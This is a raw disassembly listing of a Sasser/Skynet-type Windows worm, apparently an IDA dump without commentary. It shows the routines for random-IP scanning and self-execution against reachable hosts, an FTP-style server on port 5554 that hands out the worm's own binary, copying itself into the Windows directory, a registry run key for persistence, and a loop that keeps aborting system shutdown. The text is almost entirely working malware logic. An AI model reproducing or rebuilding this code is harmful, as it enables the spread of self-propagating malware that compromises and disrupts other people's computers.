test ebx, ebx
jz short loc_401C89
cmp edi, 4
jge short loc_401C6C
push ebx
call sub_401E6E
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C6C: ; CODE XREF: sub_401B46+116�j
jnz short loc_401C78
push ebx
call sub_401E6E
pop ecx
mov [ebp+var_18], eax
loc_401C78: ; CODE XREF: sub_401B46:loc_401C6C�j
cmp edi, 5
jnz short loc_401C8C
push ebx
call sub_401E6E
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C8C
; ---------------------------------------------------------------------------
loc_401C89: ; CODE XREF: sub_401B46+111�j
push 6
pop edi
loc_401C8C: ; CODE XREF: sub_401B46+135�j
; sub_401B46+141�j
lea eax, [ebp+Delim]
push eax ; Delim
push 0 ; Str
call _strtok
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C55
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call dword_4050E0 ; wsprintfA
add esp, 18h
push 0
push off_4068E0 ; Str
call _strlen
pop ecx
push eax
push off_4068E0
jmp loc_401E15
; ---------------------------------------------------------------------------
loc_401CE2: ; CODE XREF: sub_401B46+D5�j
lea eax, [ebp+Str]
push offset aRetr ; "RETR"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz loc_401E1A
push 0
push off_4068E4 ; Str
call _strlen
pop ecx
push eax
push off_4068E4
push ebx
call esi ; send
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DF7
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push edi
call dword_405108 ; ntohs
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call dword_40510C ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401DF7
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_405110 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401D82
push ebx
call dword_405114 ; closesocket
jmp short loc_401DF7
; ---------------------------------------------------------------------------
loc_401D82: ; CODE XREF: sub_401B46+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call dword_405030 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401DF7
lea eax, [ebp+var_2]
push offset Source ; Source
push eax ; Dest
call _strcpy
mov ebx, dword_40502C
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401DCC: ; CODE XREF: sub_401B46+2A6�j
call ebx ; _lread
cmp eax, 1
jnz short loc_401DEE
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; send
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401DCC
; ---------------------------------------------------------------------------
loc_401DEE: ; CODE XREF: sub_401B46+28B�j
push [ebp+var_8]
call dword_40501C ; _lclose
loc_401DF7: ; CODE XREF: sub_401B46+1DD�j
; sub_401B46+21B�j ...
push [ebp+var_C]
call dword_405114 ; closesocket
push 0
push off_4068DC ; Str
call _strlen
pop ecx
push eax
push off_4068DC
loc_401E15: ; CODE XREF: sub_401B46+197�j
push [ebp+arg_0]
jmp short loc_401E50
; ---------------------------------------------------------------------------
loc_401E1A: ; CODE XREF: sub_401B46+1B1�j
lea eax, [ebp+Str]
push offset aQuit ; "QUIT"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401E3A
push ebx
call dword_405114 ; closesocket
jmp short loc_401E52
; ---------------------------------------------------------------------------
loc_401E3A: ; CODE XREF: sub_401B46+2E9�j
push 0
push off_4068DC ; Str
call _strlen
pop ecx
push eax
push off_4068DC
loc_401E4F: ; CODE XREF: sub_401B46+8A�j
; sub_401B46+BB�j
push ebx
loc_401E50: ; CODE XREF: sub_401B46+2D2�j
call esi ; send
loc_401E52: ; CODE XREF: sub_401B46+2F2�j
cmp [ebp+var_10], 0
jg loc_401B81
push [ebp+arg_0]
call dword_405114 ; closesocket
pop edi
pop esi
loc_401E67: ; CODE XREF: sub_401B46+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B46 endp
; =============== S U B R O U T I N E =======================================
sub_401E6E proc near ; CODE XREF: sub_401B46+119�p
; sub_401B46+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E76: ; CODE XREF: sub_401E6E+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E80
cmp al, 9
jnz short loc_401E83
loc_401E80: ; CODE XREF: sub_401E6E+C�j
inc esi
jmp short loc_401E76
; ---------------------------------------------------------------------------
loc_401E83: ; CODE XREF: sub_401E6E+10�j
; sub_401E6E+2E�j
movsx eax, byte ptr [esi]
push eax ; C
call _isalnum
test eax, eax
pop ecx
jz short loc_401E9E
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E83
; ---------------------------------------------------------------------------
loc_401E9E: ; CODE XREF: sub_401E6E+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EA3 proc near ; DATA XREF: WinMain(x,x,x,x)+79�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_40510C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401EC7
loc_401EBF: ; CODE XREF: sub_401EA3+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401EC7: ; CODE XREF: sub_401EA3+1A�j
push 15B2h
mov [ebp+var_14], 2
call dword_405108 ; ntohs
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call dword_4050F4 ; bind
cmp eax, 0FFFFFFFFh
jz short loc_401EFF
push 5
push edi
call dword_4050F8 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_401F08
loc_401EFF: ; CODE XREF: sub_401EA3+4C�j
push edi
call dword_405114 ; closesocket
jmp short loc_401EBF
; ---------------------------------------------------------------------------
loc_401F08: ; CODE XREF: sub_401EA3+5A�j
; sub_401EA3+89�j
push esi
push esi
push edi
call dword_4050FC ; accept
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B46
push esi
push esi
call dword_405038 ; CreateThread
push 19h
call dword_405028 ; Sleep
jmp short loc_401F08
sub_401EA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401F2E proc near ; DATA XREF: WinMain(x,x,x,x)+8D�o
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
Source = byte ptr -454h
var_450 = byte ptr -450h
var_438 = byte ptr -438h
Dest = byte ptr -400h
sub esp, 45Ch
push ebx
mov ebx, dword_4050E0
push ebp
push esi
push edi
mov esi, 0FFh
mov ebp, offset aI_I_I_I ; "%i.%i.%i.%i"
loc_401F48: ; CODE XREF: sub_401F2E+195�j
and [esp+46Ch+var_458], 0
lea eax, [esp+46Ch+var_458]
push 0
push eax
call dword_4050E8 ; InternetGetConnectedState
test eax, eax
jz loc_4020BB
lea eax, [esp+46Ch+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+46Ch+var_438]
push eax
call dword_405120 ; inet_addr
movsx edi, al
movsx eax, ah
test edi, edi
mov [esp+46Ch+var_45C], eax
jge short loc_401F8C
add edi, 100h
loc_401F8C: ; CODE XREF: sub_401F2E+56�j
cmp [esp+46Ch+var_45C], 0
jge short loc_401F9B
add [esp+46Ch+var_45C], 100h
loc_401F9B: ; CODE XREF: sub_401F2E+63�j
; sub_401F2E+187�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401FFB
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401FDE
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401FF8
; ---------------------------------------------------------------------------
loc_401FDE: ; CODE XREF: sub_401F2E+8B�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push [esp+474h+var_45C]
loc_401FF8: ; CODE XREF: sub_401F2E+AE�j
push edi
jmp short loc_402027
; ---------------------------------------------------------------------------
loc_401FFB: ; CODE XREF: sub_401F2E+7B�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_402027: ; CODE XREF: sub_401F2E+CB�j
lea eax, [esp+47Ch+Source]
push ebp
push eax
call ebx ; wsprintfA
add esp, 18h
lea eax, [esp+468h+var_450]
push 3E8h
push eax
call dword_405120 ; inet_addr
push eax
call sub_401B08
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_40209E
lea eax, [esp+46Ch+Source]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_40209E
lea eax, [esp+46Ch+Dest]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [esp+46Ch+Dest]
push offset asc_406A78 ; " "
push eax ; Dest
call _strcat
lea eax, [esp+474h+Source]
push eax ; Source
lea eax, [esp+478h+Dest]
push eax ; Dest
call _strcat
add esp, 10h
lea eax, [esp+46Ch+Dest]
push 0
push eax
call dword_40503C ; WinExec
loc_40209E: ; CODE XREF: sub_401F2E+11F�j
; sub_401F2E+12E�j
push 19h
call dword_405028 ; Sleep
lea eax, [esp+46Ch+var_458]
push 0
push eax
call dword_4050E8 ; InternetGetConnectedState
test eax, eax
jnz loc_401F9B
loc_4020BB: ; CODE XREF: sub_401F2E+2E�j
push 19h
call dword_405028 ; Sleep
jmp loc_401F48
sub_401F2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+C9�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
Str = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, dword_405048
xor esi, esi
push offset aJobaka3 ; "Jobaka3"
push esi
push esi
call edi ; CreateMutexA
call dword_405044 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+Str] ; Str
call _strlen
pop ecx
test eax, eax
pop ecx
jbe short loc_402111
push [ebp+Str]
call sub_401A84
pop ecx
push 1
pop eax
loc_40210B: ; CODE XREF: WinMain(x,x,x,x)+6A�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_402111: ; CODE XREF: WinMain(x,x,x,x)+35�j
push 1
call sub_402176
mov [esp+14h+var_14], offset aSkynetsasserve ; "SkynetSasserVersionWithPingFast"
push esi
push esi
call edi ; CreateMutexA
call dword_405040 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402134
xor eax, eax
jmp short loc_40210B
; ---------------------------------------------------------------------------
loc_402134: ; CODE XREF: WinMain(x,x,x,x)+66�j
mov edi, dword_405038
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401EA3
push esi
push esi
call edi ; CreateThread
mov ebx, 80h
loc_40214F: ; CODE XREF: WinMain(x,x,x,x)+97�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401F2E
push esi
push esi
call edi ; CreateThread
dec ebx
jnz short loc_40214F
pop ebx
loc_402162: ; CODE XREF: WinMain(x,x,x,x)+AC�j
push esi
call dword_40500C ; AbortSystemShutdownA
push 0BB8h
call dword_405028 ; Sleep
jmp short loc_402162
_WinMain@16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402176 proc near ; CODE XREF: WinMain(x,x,x,x)+4B�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
Dest = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+var_824]
push esi
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+Dest]
push esi
push eax
call dword_405050 ; GetWindowsDirectoryA
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_4021CE
lea eax, [ebp+Dest]
push offset asc_406AD4 ; "\\"
push eax ; Dest
call _strcat
pop ecx
pop ecx
loc_4021CE: ; CODE XREF: sub_402176+43�j
push off_4068C8 ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcat
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_4021FE
lea eax, [ebp+Dest]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call dword_40504C ; CopyFileA
loc_4021FE: ; CODE XREF: sub_402176+70�j
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call dword_405000 ; RegOpenKeyA
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push 1
push 0
push off_4068C8
push [ebp+var_4]
call dword_405004 ; RegSetValueExA
push [ebp+var_4]
call dword_405008 ; RegCloseKey
leave
retn
sub_402176 endp
; ---------------------------------------------------------------------------
align 10h
; [00000058 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000080 BYTES: COLLAPSED FUNCTION _strstr. PRESS KEYPAD "+" TO EXPAND]
; [0000009C BYTES: COLLAPSED FUNCTION _strtok. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E0 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
; [0000002E BYTES: COLLAPSED FUNCTION _isalnum. PRESS KEYPAD "+" TO EXPAND]
; [000000D7 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call __exit
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; [00000024 BYTES: COLLAPSED FUNCTION _fast_error_exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION ___from_strstr_to_strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
; [000000B6 BYTES: COLLAPSED FUNCTION ___from_strstr_to_strchr. PRESS KEYPAD "+" TO EXPAND]
; [00000075 BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000141 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION _xcptlookup. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000B9 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [000001B4 BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [00000132 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_406D9C
jmp short loc_403540
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_2: ; Microsoft VisualC 2-8/net runtime
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call __local_unwind2
add esp, 8
pop ebp
retn 4
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000153 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [00000149 BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000199 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000004A BYTES: COLLAPSED FUNCTION _getSystemCP. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [00000185 BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [0000032B BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [00000309 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B1 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [000000FB BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [00000089 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FE BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; [00000224 BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION _strncnt. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D46 proc near ; CODE XREF: sub_401B08+33�p
jmp dword_405134
sub_404D46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D4C proc near ; CODE XREF: sub_401B08+24�p
jmp dword_40512C
sub_404D4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D52 proc near ; CODE XREF: sub_401B08+7�p
jmp dword_405130
sub_404D52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D58 proc near ; CODE XREF: __global_unwind2+13�p
jmp dword_405080
sub_404D58 endp
; ---------------------------------------------------------------------------
align 10h
dd 0A8h dup(0)
dword_405000 dd 77DFC41Bh ; resolved to->ADVAPI32.RegOpenKeyAdword_405004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_405008 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_40500C dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownA dd 0
dword_405014 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_405018 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_40127D+8F�r ...
dword_40501C dd 7C834E64h ; resolved to->KERNEL32._lclose ; sub_401B46+2AB�r
dword_405020 dd 7C838AE7h ; resolved to->KERNEL32._lwritedword_405024 dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_405028 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_40159E+4D0�r ...
dword_40502C dd 7C8353CEh ; resolved to->KERNEL32._lreaddword_405030 dd 7C85E830h ; resolved to->KERNEL32._lopendword_405034 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401F2E+13C�r ...
dword_405038 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; WinMain(x,x,x,x):loc_402134�r
dword_40503C dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_405040 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_405044 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_405048 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_40504C dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_405050 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_405054 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_405058 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeapdword_40505C dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; ___sbh_alloc_new_group+51�r
dword_405060 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; ___sbh_heap_init+D�r ...
dword_405064 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_405068 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_40506C dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; _setSBUpLow+14�r
dword_405070 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; ___crtGetStringTypeA+12D�r
dword_405074 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; ___crtGetStringTypeA+8D�r
dword_405078 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; ___crtGetStringTypeA+11B�r ...
dword_40507C dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_405080 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_405084 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; ___sbh_free_block+2C4�r ...
dword_405088 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_40508C dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_405090 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_405094 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; __ioinit+166�r
dword_405098 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; ___crtLCMapStringA+A7�r
dword_40509C dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; ___crtLCMapStringA+14D�r ...
dword_4050A0 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; __NMSG_WRITE+143�r
dword_4050A4 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4050A8 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4050AC dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; ___crtGetEnvironmentStringsA+E1�r
dword_4050B0 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; ___crtLCMapStringA+20D�r
dword_4050B4 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4050B8 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4050BC dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_4050C0 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4050C4 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4050C8 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; _doexit+91�r
dword_4050CC dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_4050D0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4050D4 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4050D8 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsA align 10h
dword_4050E0 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_40127D+B7�r ...
align 8
dword_4050E8 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; sub_401F2E+17F�r
align 10h
dword_4050F0 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_4050F4 dd 71AB3E00h ; resolved to->WS2_32.binddword_4050F8 dd 71AB88D3h ; resolved to->WS2_32.listendword_4050FC dd 71AC1028h ; resolved to->WS2_32.acceptdword_405100 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_40159E+2DD�r ...
dword_405104 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_401398+151�r ...
dword_405108 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_40127D+27�r ...
dword_40510C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_40127D+51�r ...
dword_405110 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_40127D+6C�r ...
dword_405114 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_40127D+10F�r ...
dword_405118 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_40511C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoadword_405120 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_4011D5+7�r ...
dword_405124 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_4011D5+1E�r ...
dd 0
dword_40512C dd 76D64B79h ; resolved to->IPHLPAPI.IcmpSendEchodword_405130 dd 76D64D5Eh ; resolved to->IPHLPAPI.IcmpCreateFiledword_405134 dd 76D64D33h ; resolved to->IPHLPAPI.IcmpCloseHandle align 10h
dword_405140 dd 0FFFFFFFFh, 4029B5h, 4029C9h, 746E7572h, 20656D69h dd 6F727265h, 2072h, 0A0Dh, 534F4C54h, 72652053h, 0D726F72h
dd 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
